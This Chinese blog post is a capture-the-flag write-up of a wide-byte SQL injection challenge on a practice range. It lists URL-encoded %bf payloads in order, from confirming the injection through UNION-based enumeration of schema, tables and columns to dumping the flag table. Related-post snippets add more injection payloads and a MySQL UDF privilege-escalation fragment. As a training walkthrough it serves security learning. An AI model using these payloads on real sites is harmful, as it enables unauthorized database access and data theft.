SQL宽字节注入01

最新推荐文章于 2023-08-24 12:17:12 发布
最新推荐文章于 2023-08-24 12:17:12 发布
阅读量294 收藏
点赞数
分类专栏: 安鸾渗透实战平台
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aa18390583207/article/details/103633359
版权

靶机地址:http://www.whalwl.top:8011【2020年8月前有效】

1、http://www.whalwl.top:8011/wide.php?id=1%bf' and 1=1 %23   //不报错

     http://www.whalwl.top:8011/wide.php?id=1%bf' and 1=2 %23   //报错

代码执行,说明存在注入


2、id=1%bf' order by 5 %23    //查看字段数,即列数

3、id=1%bf' and 1=2  union select 1,2,3,4,5%23   //查找回显点

4、id=1%bf' and 1=2  union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata %23

//查找有哪些数据库,  该语句查出了全部的数据库

5、id=1%bf' and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema = 'kzf' %23  //查找kzf中有哪些表

报错,原因是转义了单引号,需要嵌套查询,避免出现单引号

1)先select database()找出当前数据库 【可省略】

    %bf' and 1=2  union select 1,database(),3,4,5 from information_schema.schemata %23

2)将'kzf'改为 select database()

     id=1%bf' and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema = (select database()) %23

 

6、我想进行第三层嵌套的时候,不是报错,就是显示空内容。来回试了几次的我觉得另找它路,发现:

可以将需要用单引号括起的表名、列名可以转换成16进制,同样可以绕过单引号转义

id=1%bf' and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema =(select database()) and table_name =0x746869735f666c6167 %23  //查找this_flag的字段名

7、id=1%bf' and 1=2 union select 1,id,flag,4,5 from this_flag %23   //获取字段内容

海宝最美
关注
专栏目录
web渗透--33--宽字节注入
武天旭的博客
09-16 1015
1、漏洞描述: 宽字节注入是相对于单字节注入而言的,该注入跟HTML页面编码无关,宽字节注入常见于mysql中,GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节。宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象,当%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了%df...
sqlmap跑宽字节注入(渗透测试之SQL注入之宽字节注入)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-09 922
宽字节注入就是用一个大于128的十六进制数来吃掉转义符,gbk编码,字节作为一个字符的编码手工注入 一、什么是宽字节注入 宽字节是相对于ascII这样单字节而言的;像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的宽字节,实际上只有两字节。GBK 是一种多字符的编码,通常来说,一个 gbk 编码汉字,占用2个字节。一个 utf-8 编码的汉字,占用3个字节。 转义函数:为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义; 宽字节注入指的是 mysql 数据
mysql+宽字节注入_sql注入入门 之mysql宽字节注入
weixin_36308848的博客
01-19 185
1,如下,宽字节注入的原型实例代码,注意连接字符集为gbk,对传入的值已用addslashes()做了转义,另外,php是把id当做一个字符串来接收的,后面在闭合的时候需要注意下,具体如下:2,本此用于测试的 宽字节注入点,如下http://192.168.3.23/wide/0x01/index.php?id=23,这时当我们用经典的单引号尝试对传入参数进行干扰时发现,貌似并没有任何反应,原因很...
安鸾平台宽字节注入
你的网线学长吖
03-18 3949
1.题目URL:http://47.103.94.191:8011 2.首先尝试加’,发现被转义为. 但是当数据库编码为GBK时,可以使用宽字节注入,先在地址后面加%df,因为反斜杠的编码为%5c,gbk中%df%5c是繁体字 所以说在1和’中间添加%df 加入后发现 合理 3.尝试爆破 爆数据库:union select 1,database(),3,4,5 --+ 报表: union select 1,group_concat(table_name),3,4,5 from information_s
安鸾渗透实战平台|宽字符注入
m_de_g的博客
12-17 2902
安鸾渗透实战平台|宽字符注入 一、渗透靶场地址 http://www.whalwl.work:8011 二、渗透实战 1.先使用1'进行测试,发现被斜杆转义 2.根据题目提示,直接上手宽字节注入,可以成功 ?id=1%df'--+ 3.测试or,and,==是否被过滤 ?id=1%df' or 1=1--+ 4.判断列 ?id=1%df' order by 1,2,3,4,5,6--+ 5.发现有5列,判断注入点 ?id=0%df' union select 1,2,3,4,5--+ 6.
安鸾渗透实战平台-SQL字符型注入
qxx5203的博客
07-21 515
漏洞URLhttp//47.103.94.1918005//bug/sql_injection/sql_string.php?title=1&submit=submit。数据库列的信息id,,不是我们需要的内容。查找flag表下的列。
SQL注入宽字节注入
qq_45557130的博客
10-09 421
sql注入宽字节注入
第十九节 宽字节SQL注入-01
最新发布
09-15
宽字节注入代码分析 在宽字节SQL注入攻击中,攻击者可以使用 Php 的addslashes 函数来转义特殊字符,例如将“'”转义为“%DF\'”。然后,在MYSQL中,这个宽字符将被认为是一个合法的字符,从而 bypass 数据库的安全...
SQL注入之宽字节注入
m0_56578216的博客
08-24 375
宽字节注入准确来说不是注入手法,而是另外一种比较特殊的情况。宽字节注入是一种绕过单双引号转义的手段,严格来说并不是注入手段。
SQL宽字节注入
qq_64332865的博客
02-19 3390
宽字节注入适用于cms和数据库对字符串的编码方式不统一、WAF利用 AddSlashes()等函数对敏感字符进行转义的场景。 统一的国际规范的理想状态是所有应用程序都使用Unicode编码,所有的网站 都使用UTF-8编码。但因为一些历史原因,国内及国外(特别是非英语国家)的一些cms仍然使用着自己国家的一套编码(如GBK);也有一些cms为了考 虑老用户,出了GBK和 UTF-8两个版本。 一个GBK编码汉字,占用2个字节;一个UTF-8编码的汉字,占用3-4个字节。当Web应用程序的编码方式为GBK,而
安鸾渗透实战平台】安全基础/( 全 | 通关 )
qq_34485854的博客
11-21 2662
靶场WP | 安鸾渗透实战平台 / 安全基础 | 通关
linux mysql udf 提权
ddr12231的博客
05-09 695
连接远程数据库 查看插件库路径 show variables like '%plugin%'; 写入udf库到插件目录: select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000...
Webservice之应用协议SOAP
心火燃烧!
11-08 610
什么是SOAP? SOAP 是一种简单的基于 XML 的协议,它使应用程序通过 HTTP 来交换信息。或者更简单地说:SOAP 是用于访问网络服务的协议。 SOAP 指简易对象访问协议 SOAP 是一种通信协议 SOAP 用于应用程序之间的通信 SOAP 是一种用于发送消息的格式 SOAP 被设计用来通过因特网进行通信 SOAP 独立于平台 SOAP 独立于语言 SOAP 基于 XML SOAP...
安鸾渗透实战平台-sql注入篇
weixin_48421613的博客
01-04 3398
sql注入篇 安鸾渗透实战平台是一个在线的靶场平台,需要通过一些列手段找到flag提交 文章目录sql注入篇SQL字符型注入(1-2)一、需识别mysql默认的information库二、内部结构1.schemata表内容2.tables表内容3.columns表内容4.解题思路SQL搜索型注入总结 SQL字符型注入(1-2) 开始忘记截图了,只好给大家直接写一下payload了 提示:仅适合参考 一、需识别mysql默认的information库 mysql 5.0版本以上会有一个默认的infor
安鸾渗透实战平台wp(持续更新)
Delity的博客
05-13 6912
一、SQL注入 SQL数字型GET注入01 漏洞URL:http://www.whalwl.top:8001/bug/sql_injection/sql_num.php 1’报错,输入-1返回正常,构造payload, 判断字段:显示位在第二位和第三位 -1 order by 3 # 爆库: -1 union select 1,database(),3 # 爆表: -1 union select 1,group_concat(table_name),3 from information_sch
靶场wp
东方
09-24 1042
1 代码审计: http://xuptnetsec.site:8089/first/index.php?tdsourcetag=s_pcqq_aiomsg 代码审计题: <?php /** * from Guardian oath * **/ show_source(__FILE__); include "flag.php"; $data=array(); $pas...
安鸾靶场 sql注入--SQL数字型GET注入01
s666789s的博客
04-06 597
1.SQL数字型GET注入01 (1)输入1’报错,输入-1返回正常,构造payload (2)判断显示位 -1 order by 3# -1 union select 1,2,3# (3)爆库:-1 union select 1,database(),3# (4)爆表:-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘dwvs’# (5)爆列:-1 union se
SQL字符型注入
海宝最美的博客
12-04 709
SQL字符型注入 靶机地址:http://www.whalwl.top:8005//bug/sql_injection/sql_string.php?title=1&submit=submit【2020年8月前有效】 多点几次submit,它会出现这么个玩意 都说了是字符型,直接上 whalwl' //报错 whalwl' # //注释单引号,不报错 ...
一道练习题的WP-菜刀一句话
luoluopeach
12-19 401
题目地址:http://www.whalwl.top:8013 题目描述: 菜刀一句话:http://www.whalwl.com:8013/webshell.php 密码: whalwl 我一开始是直接将题目的URL上传到蚁剑,但是并没有链接成功,于是访问题目中的菜刀一句话,再上传蚁剑 上传成功后打开文件管理 一个一个 查看,发现在init.php中有我们需要的东西 按照要求连接数据库...
sql注入宽字节注入
07-28
SQL注入和宽字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入: SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值